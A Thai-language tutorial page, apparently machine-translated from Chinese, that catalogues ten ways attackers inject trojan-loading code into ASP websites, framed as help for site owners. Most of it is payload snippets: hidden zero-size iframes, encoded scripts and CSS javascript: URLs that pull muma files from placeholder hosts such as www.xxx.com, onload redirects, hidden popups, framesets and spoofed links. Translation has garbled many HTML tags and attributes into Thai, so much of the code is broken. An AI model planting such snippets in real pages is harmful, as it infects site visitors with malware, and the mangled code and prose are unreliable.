หน้าแรก>บทช่วยสอนการเขียนโปรแกรมเครือข่าย>กวดวิชา ASP

สรุปวิธีการขึ้นม้าใน Asp

ผู้เขียน:Eve Cole เวลาอัปเดต:2025-03-06 16:48:02

บทความนี้จะบอกคุณถึงวิธีการที่ผู้ร้ายมักใช้ในการแฮงค์โทรจันบนหน้าเว็บ เพื่อให้คุณสามารถป้องกันหน้าเว็บของคุณเองได้ ตราบใดที่คุณตรวจพบตำแหน่งเหล่านี้ซึ่งมักใช้ในการแฮงค์โทรจัน คุณก็จะสามารถค้นหาตำแหน่งได้อย่างง่ายดาย ของโทรจัน

1: โครงแขวนม้า

<iframe src=ความกว้างที่อยู่=0 ความสูง=0></iframe>

คุณสามารถป้อนลิงก์เว็บไซต์ที่เป็นอันตรายตามที่อยู่ ฯลฯ

สอง: การติดตั้งไฟล์ js

ตราบใดที่มันเป็นไฟล์ JS ก็สามารถแก้ไขได้และเชื่อมโยงกับโค้ดที่เป็นอันตราย โดยทั่วไป โค้ด JS ที่อ้างอิงโดยทั้งไซต์มักจะเชื่อมโยงกับม้าโทรจัน เพื่อการตรวจจับ ด้านซ้ายหรือด้านล่างของโค้ด JS ผู้ร้ายชอบรวมโค้ดที่เป็นอันตรายเข้ากับโค้ดปกติโดยมีการเว้นวรรคจำนวนมาก ดังนั้นคุณควรตรวจสอบว่าโค้ดเพจ JS ถูกขยายโดยเจตนาหรือไม่

สาม: การเข้ารหัสการเปลี่ยนรูป js

<SCRIPT language=JScript.Encode src=http://www.xxx.com/muma.txt></script>

muma.txt สามารถเปลี่ยนเป็นคำต่อท้ายใดก็ได้

สี่: ม้าแขวนร่าง

<body onload=window.location='address';></body>

ห้า: ซ่อนม้าแขวนอยู่

top.document.body.innerHTML = top.document.body.innerHTML + '/r/n<iframe src=http://www.xxx.com/muma.htm/></iframe>';

หก: ม้าแขวนอยู่ใน css

ร่างกาย {

ภาพพื้นหลัง: url('javascript:document.write(<script src=http://www.XXX.net/muma.js></script>)')}

วิธีนี้เป็นวิธีที่โหดเหี้ยมและตรวจจับได้ยากกว่า

เซเว่น:JAJA แขวนม้า

<ภาษาสคริปต์=จาวาสคริปต์>

window.open (ที่อยู่,,แถบเครื่องมือ=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1);

</สคริปต์>

แปด: การปลอมตัวของรูปภาพ

<html>

<iframe src=网马地址 height=0 width=0></iframe>

<img src=ที่อยู่รูปภาพ></ศูนย์>

</html>

เก้า: โทรปลอม

<แถวเฟรมเซ็ต=444,0 คอลัมน์=*>

<frame src=เปิดหน้าเว็บ framborder=no scrolling=auto noresize marginwidth=0margingheight=0>

<frame src=网马地址 frameborder=no scrolling=no noresize marginwidth=0margingheight=0>

</เฟรมเซต>

สิบ: การหลอกลวงขั้นสูง

<a href=http://www.163.com (สร้างความสับสนให้กับที่อยู่การเชื่อมต่อและแสดงว่าที่อยู่นี้ชี้ไปยังที่อยู่โทรจัน) onMouseOver=www_163_com(); return true;> เนื้อหาที่จะแสดงบนเพจ</a>

<ภาษาสคริปต์=จาวาสคริปต์>

ฟังก์ชั่น www_163_com ()

-

var url=ที่อยู่ม้าสุทธิ;

open(url,NewWindow,toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10, บน=10);

-

</สคริปต์>

บทความที่เกี่ยวข้อง